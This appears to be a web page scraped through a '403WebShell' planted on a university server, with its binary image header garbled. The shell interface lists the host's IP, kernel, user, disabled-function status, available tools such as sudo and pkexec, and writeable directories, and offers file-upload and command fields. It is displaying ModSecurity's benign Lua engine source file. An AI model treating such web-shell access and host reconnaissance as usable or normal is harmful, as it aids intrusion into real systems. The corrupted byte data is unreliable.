RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð �PNG  ��� IHDR���0���0����`n���� cHRM��z&��������������u0���`��:���p��Q<���bKGD�������������tIME� 6���� AIDATX��]pU����{��{�G�n$$@ -�-jВAک��P��1O���j��:cU|hg�}�C�ʋU�:�A A�����|$$$������}�^}8i *�د�?w�9gݵ��:{��F"��&��4� �@��@q_����Ow��9<<|�ԩ�;w���"�#GV�^}Ճ7�|s˖-{��|��G�-[��R�Q�aőTR)� �2!�e�63��X�U������{��Z�m۶�^}�5����}����v�퟇R��J�J,�$� B�$Ф")�i��D�9+䜆B.�qf�үÇoذaժU�i>��so����a^���۷����3�<�ꫯnݺ��"���\���gn0�h��B�i� hR��,W*�e�65��LS�ر�0ēO>���755���ι@O?��ҥK������:::����1��X�9S�%�'�I���$��Sg�ڥ3'zF/� ��Z�8ES6WZ#�. �\��P�R�2����-[�,_�|�`�j�Xl6M���b�Z�* �jҟ0��҉B""� y22r�ܹ�CG�;���{7nn��ma���������2S���� <��x�⡡�|p.Pw��x��y�C�=��O� ��CB}�ӵ����?�wq`8�e����{+Չɱ�\{&� LL������vww��]��?q��Y�������P(���vuu9���S?w���ݻ�v<���mш ��D�DR&�j�X�����y񪂬�>���dyg�7��b��s�p��E���BDR� t����������=w�\�[;:[&._�Dlڸv�]�� u�驚�/Y�a�����d�%��*)1� �V\G���[F]����X���i����J:z�N�9�?xϭ+X�V|���U�n� �g���hҜ�b�aҢ ^��j�f�ZV�K��w.�ؾp�}{� �/e��{O�o�����R�8���i� !jB`�3n;Mw.=7�S�'��F�y W��x�}LXNfz���� �b�p�b�bq~�����s�4�H�2��q^�r�� n���\aFf4�����n�c��Q�n�X�,����ӑҤd5DDDd 9'd��,�l��.���)?��������#}C�k����ܖq����m�a��y��8D���,K)�I�$I�8NE�aH)�|�VCDƘ��DF0D@M �"3�+�����Kcú��+n}��-�k:W�K������3ƄRʌ��m۞��q�9WJ���d�0�, �8��ٶ�⦈B�h���䩡�eDCj&$ �1�Y��\�>{~`�M����ͷt�#?VZ'@D²l"�,+�ɤc0�r��R*��X��n�_kMD�1"""ι�:%X��� $�b:i�b4 �X<�/"r�����[Vo��T��0V�i���sΓ$IG���4M�c �R�eq��QS�+5{�{�,��a"� �D�2�CҐ(I`CS�s�ʥ�R&�p�����۴(�N���e�sq�Ғ|%�����k�=�0S3@�`�i9�K��Պ�0T�Y��ؼD*��DE��2�gO�bŷrY����z�T��R�҉҆SX�Tϑ����/�Zi�eL��X��jdx䏿�eَ ���7��П"?�����0y����<��R�N8�\X9ӥx ��^�L�l�ކ��u����/���Q�B�^p�f��\3��]�INƑ�L�"--�r�! 8?���Rp~����v��|�M��$����_M �����GgF�/U�^�^p�Dk�ٲ�vM� ����L$�eGʓ01*���Two��f��#���ޱ��7��!5rdy"D��V���\ט�� [y�f ���@���Um����2w\�fg_򯯃z�y���v|`$_ow402�|���c��Zt��J��Yw��݌�b8+L����R�t߉O�xS���'�L��`/lY�� ���Z;f�nX���f��$�<���Ϩ�J��z"�y��%�qzz��(B��Y�@D�)�uS���<�\.[�����*T(�8v�̗����rrr2I�� N5w����^k=�}�:�S�yӌ��ً+�����NY碧f����0)��h. �R����4�Ա�>�X,:����c�0�0 �Rn6���mii�MW*�j��i�I�0�,ˊ��� È�8���j�$I �hkk �`||�B!b��l6�8Ncc��U��<���1f�&"FQdYV�B�b���j3�>� !��j>���g���g��RD����8���r�08�׵u�7��]3������~�,b�P���%tEXtdate:create�2025-02-07T10:02:54+00:00� t����%tEXtdate:modify�2025-02-07T10:02:54+00:00�P�6���(tEXtdate:timestamp�2025-02-07T10:02:54+00:00�E������IEND�B`� 403WebShell
403Webshell
Server IP : 128.227.220.250  /  Your IP : 216.73.216.35
Web Server : Apache/2.4.64 (Unix) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux dumont.ece.ufl.edu 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : daemon ( 2)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/source/current/ModSecurity/src/engine/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /opt/source/current/ModSecurity/src/engine/lua.cc
/*
 * ModSecurity, http://www.modsecurity.org/
 * Copyright (c) 2015 - 2021 Trustwave Holdings, Inc. (http://www.trustwave.com/)
 *
 * You may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * If any of the files related to licensing are missing or if you have any
 * other questions related to licensing please contact Trustwave Holdings, Inc.
 * directly using the email address security@modsecurity.org.
 *
 */


#include "src/engine/lua.h"

#include <stdio.h>
#include <string.h>

#include <vector>
#include <string>
#include <algorithm>
#include <sstream>
#include <iterator>
#include <iostream>

#include "modsecurity/variable_value.h"
#include "modsecurity/modsecurity.h"
#include "src/utils/string.h"
#include "modsecurity/transaction.h"
#include "src/variables/variable.h"
#include "src/variables/highest_severity.h"
#include "src/actions/transformations/transformation.h"


namespace modsecurity {
namespace engine {


bool Lua::isCompatible(const std::string &script, Lua *l, std::string *error) {
#ifdef WITH_LUA
    std::string lua(".lua");
    std::string err;

    if (!(script.size() >= lua.size() &&
        script.compare(script.size() - lua.size(), lua.size(), lua) == 0)) {
        error->assign("Expecting a Lua script: " + script);
        return false;
    }

    if (l->load(script, &err) == false) {
        error->assign("Problems load script: " + err);
        return false;
    }

    return true;
#else
    error->assign("Lua support was not enabled.");
    return false;
#endif
}


bool Lua::load(const std::string &script, std::string *err) {
#ifdef WITH_LUA
    lua_State *L = luaL_newstate();
    luaL_openlibs(L);

    m_scriptName = script;
    if (luaL_loadfile(L, script.c_str())) {
        const char *luaerr = lua_tostring(L, -1);
        err->assign("Failed to compile script '" + script + "");
        if (luaerr) {
            err->append(": " + std::string(luaerr));
        }
        err->append(".");
        lua_close(L);

        return false;
    }

#if defined (WITH_LUA_5_2) || defined (WITH_LUA_5_1)
    if (lua_dump(L, Lua::blob_keeper, reinterpret_cast<void *>(&m_blob))) {
#else
    if (lua_dump(L, Lua::blob_keeper, reinterpret_cast<void *>(&m_blob), 0)) {
#endif
        const char *luaerr = lua_tostring(L, -1);
        err->assign("Failed to compile script '" + script + "");
        if (luaerr) {
            err->append(": " + std::string(luaerr));
        }
        err->append(".");
        lua_close(L);

        return false;
    }

    lua_close(L);
    return true;
#else
    err->assign("Lua support was not enabled.");
    return false;
#endif
}

#ifdef WITH_LUA
int Lua::blob_keeper(lua_State *L, const void *p, size_t sz, void *ud) {
    LuaScriptBlob *lsb = static_cast<LuaScriptBlob *>(ud);
    lsb->write(p, sz);
    return 0;
}


const char *Lua::blob_reader(lua_State *L, void *ud, size_t *size) {
    LuaScriptBlob *lsb = static_cast<LuaScriptBlob *>(ud);
    const char *data = lsb->read(size);
    return data;
}
#endif


int Lua::run(Transaction *t, const std::string &str) {
#ifdef WITH_LUA
    std::string luaRet;
    const char *a = NULL;
    int ret = true;
    lua_State *L = luaL_newstate();
    luaL_openlibs(L);

    luaL_newmetatable(L, "luaL_msc");
    lua_newtable(L);

    lua_pushlightuserdata(L, reinterpret_cast<void *>(t));
    lua_setglobal(L, "__transaction");

    luaL_setfuncs(L, mscLuaLib, 0);
    lua_setglobal(L, "m");

#ifdef WITH_LUA_5_1
    int rc = lua_load(L, Lua::blob_reader, &m_blob, m_scriptName.c_str());
#else
    int rc = lua_load(L, Lua::blob_reader, &m_blob, m_scriptName.c_str(),
        NULL);
#endif
    if (rc != LUA_OK) {
        std::string e;
        e.assign("Failed to execute lua script: " + m_scriptName + ". ");
        switch (rc) {
            case LUA_ERRSYNTAX:
                e.assign("Syntax error. ");
                break;
            case LUA_ERRMEM:
                e.assign("Memory error. ");
                break;
#if !defined(WITH_LUA_5_1) and !defined(WITH_LUA_5_4)
            case LUA_ERRGCMM:
                e.assign("Garbage Collector error. ");
                break;
#endif
        }
        e.append(lua_tostring(L, -1));
        ms_dbg_a(t, 2, e);
        ret = false;
        goto err;
    }

    if (lua_pcall(L, 0, 0, 0)) {
        std::string e;
        const char *luaerr = lua_tostring(L, -1);
        e.assign("Failed to execute lua script: " + m_scriptName \
            + " (before main)");
        if (luaerr != NULL) {
            e.append(" - ");
            e.append(luaerr);
        }
        ms_dbg_a(t, 2, e);

        ret = false;
        goto err;
    }

    lua_setglobal(L, "modsec");

    lua_getglobal(L, "main");

    ms_dbg_a(t, 1, str);

    /* Put the parameter on the stack. */
    if (!str.empty() ) {
        lua_pushlstring(L, str.c_str(), str.length());
    }

    if (lua_pcall(L, ((!str.empty()) ? 1 : 0), 1, 0)) {
        std::string e;
        const char *luaerr = lua_tostring(L, -1);
        e.assign("Failed to execute lua script: " + m_scriptName + " (main)");
        if (luaerr != NULL) {
            e.append(" - ");
            e.append(luaerr);
        }
        ms_dbg_a(t, 2, e);

        ret = false;
        goto err;
    }

    a = reinterpret_cast<const char *>(lua_tostring(L, -1));
    if (a != NULL) {
        luaRet.assign(a);
    }

    ms_dbg_a(t, 9, "Returning from lua script: " + luaRet);

    if (luaRet.size() == 0) {
        ret = false;
    }


err:
    lua_pop(L, 1);
    lua_close(L);

    return ret;
#else
    ms_dbg_a(t, 9, "Lua support was not enabled.");

    return false;
#endif
}


#ifdef WITH_LUA
int Lua::log(lua_State *L) {
    const Transaction *t(NULL);
    const char *text;
    int level;

    /* Retrieve parameters. */
    level = luaL_checknumber(L, 1);
    text = luaL_checkstring(L, 2);

    /* Retrieve msr. */
    lua_getglobal(L, "__transaction");
    t = reinterpret_cast<const Transaction *>(lua_topointer(L, -1));

    /* Log message. */
    if (t != NULL) {
        ms_dbg_a(t, level, text);
    }

    return 0;
}


int Lua::getvar(lua_State *L) {
    const char *varname(NULL);
    Transaction *t(NULL);
    void *z(NULL);

    /* Retrieve parameters. */
    varname = reinterpret_cast<const char *>(luaL_checkstring(L, 1));

    lua_getglobal(L, "__transaction");
    z = const_cast<void *>(lua_topointer(L, -1));
    t = reinterpret_cast<Transaction *>(z);

    std::string var = variables::Variable::stringMatchResolve(t, varname);
    var = applyTransformations(L, t, 2, var);

    if (var.size() == 0) {
        lua_pushnil(L);
        return 0;
    }

    lua_pushlstring(L, var.c_str(), var.size());

    return 1;
}


int Lua::getvars(lua_State *L) {
    const char *varname(NULL);
    Transaction *t(NULL);
    void *z(NULL);
    std::vector<const VariableValue *> l;
    int idx = 1;

    /* Retrieve parameters. */
    varname = reinterpret_cast<const char *>(luaL_checkstring(L, 1));

    lua_getglobal(L, "__transaction");
    z = const_cast<void *>(lua_topointer(L, -1));
    t = reinterpret_cast<Transaction *>(z);

    variables::Variable::stringMatchResolveMulti(t, varname, &l);

    lua_newtable(L);
    for (auto i : l) {
        lua_pushnumber(L, idx);
        lua_newtable(L);

        lua_pushstring(L, "name");
        lua_pushlstring(L, i->getKeyWithCollection().c_str(), i->getKeyWithCollection().size());
        lua_settable(L, -3);

        lua_pushstring(L, "value");
        lua_pushlstring(L, i->getValue().c_str(), i->getValue().size());
        lua_settable(L, -3);

        lua_settable(L, -3);
        idx++;
    }

    for (const VariableValue * i : l) {
        delete i;
    }

    return 1;
}


int Lua::setvar(lua_State *L) {
    Transaction *t(NULL);
    const char *var_value(NULL);
    const char *var_name(NULL);
    std::string vname;
    std::string collection;
    std::string variableName;
    int nargs = lua_gettop(L);
    char *chr = NULL;
    size_t pos;
    void *z(NULL);

    lua_getglobal(L, "__transaction");
    z = const_cast<void *>(lua_topointer(L, -1));
    t = reinterpret_cast<Transaction *>(z);


    if (nargs != 2) {
        ms_dbg_a(t, 8,
            "m.setvar: Failed m.setvar funtion must has 2 arguments");
        return -1;
    }
    var_value = luaL_checkstring(L, 2);
    var_name = luaL_checkstring(L, 1);

    lua_pop(L, 2);

    if (var_value == NULL || var_name == NULL) {
        return -1;
    }

    vname.assign(var_name);
    pos = vname.find(".");
    if (pos != std::string::npos) {
        collection = std::string(vname, 0, pos);
        collection = utils::string::toupper(collection);
        variableName = std::string(vname, pos + 1,
            std::string::npos);

    } else {
        ms_dbg_a(t, 8,
            "m.setvar: Must specify a collection using dot character" \
            " - ie m.setvar(tx.myvar,mydata)");
        return -1;
    }

    if (collection == "TX") {
        t->m_collections.m_tx_collection->storeOrUpdateFirst(
            variableName,
            var_value);
    }
    else if (collection == "IP") {
        t->m_collections.m_ip_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_ip_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    }
    else if (collection == "GLOBAL") {
        t->m_collections.m_global_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_global_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    }
    else if (collection == "RESOURCE") {
        t->m_collections.m_resource_collection->storeOrUpdateFirst(
            variableName,
            t->m_collections.m_resource_collection_key, 
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    }
    else if (collection == "SESSION") {
         t->m_collections.m_session_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_session_collection_key,
                    t->m_rules->m_secWebAppId.m_value,
            var_value);
    }
    else if (collection == "USER") {
        t->m_collections.m_user_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_user_collection_key,
                    t->m_rules->m_secWebAppId.m_value,
            var_value);

    }
    return 0;
}


std::string Lua::applyTransformations(lua_State *L, Transaction *t,
    int idx, std::string var) {
    std::string newVar = var;

    if (lua_isuserdata(L, idx) || lua_isnoneornil(L, idx)) {
        return var;
    }

    if (lua_istable(L, idx)) {
        const char *name = NULL;
#ifdef WITH_LUA_5_1
        int i, n = lua_objlen(L, idx);
#else
        int i, n = lua_rawlen(L, idx);
#endif

        for (i = 1; i <= n; i++) {
            lua_rawgeti(L, idx, i);
            name = reinterpret_cast<const char *>(luaL_checkstring(L, -1));

            /* A "none" means start over */
            if (strcmp("none", name) == 0) {
                newVar = var;
                continue;
            }

            actions::transformations::Transformation *tfn = \
                actions::transformations::Transformation::instantiate(
                    "t:" + std::string(name));
            // FIXME: transformation is not yet returning null.
            if (tfn) {
                newVar = tfn->evaluate(newVar, t);
            } else {
                ms_dbg_a(t, 1,
                    "SecRuleScript: Invalid transformation function: " \
                    + std::string(name));
            }
            delete tfn;
        }

        return newVar;
    }

    if (lua_isstring(L, idx)) {
        const char *name(NULL);
        name = reinterpret_cast<const char *>(luaL_checkstring(L, idx));

        actions::transformations::Transformation *tfn = \
            actions::transformations::Transformation::instantiate(
                "t:" + std::string(name));

        // FIXME: transformation is not yet returning null.
        if (tfn) {
            newVar = tfn->evaluate(newVar, t);
            delete tfn;
        } else {
            ms_dbg_a(t, 1, "SecRuleScript: Invalid transformation function: " \
                + std::string(name));
        }
        return newVar;
    }
    ms_dbg_a(t, 8, "SecRuleScript: Transformation parameter must be a " \
        "transformation name or array of transformation names, but found " \
        "" + std::string(lua_typename(L, idx)) + " (type " \
        + std::to_string(lua_type(L, idx)) + ")");
    return newVar;
}
#endif

}  //  namespace engine
}  //  namespace modsecurity

Youez - 2016 - github.com/yon3zu
LinuXploit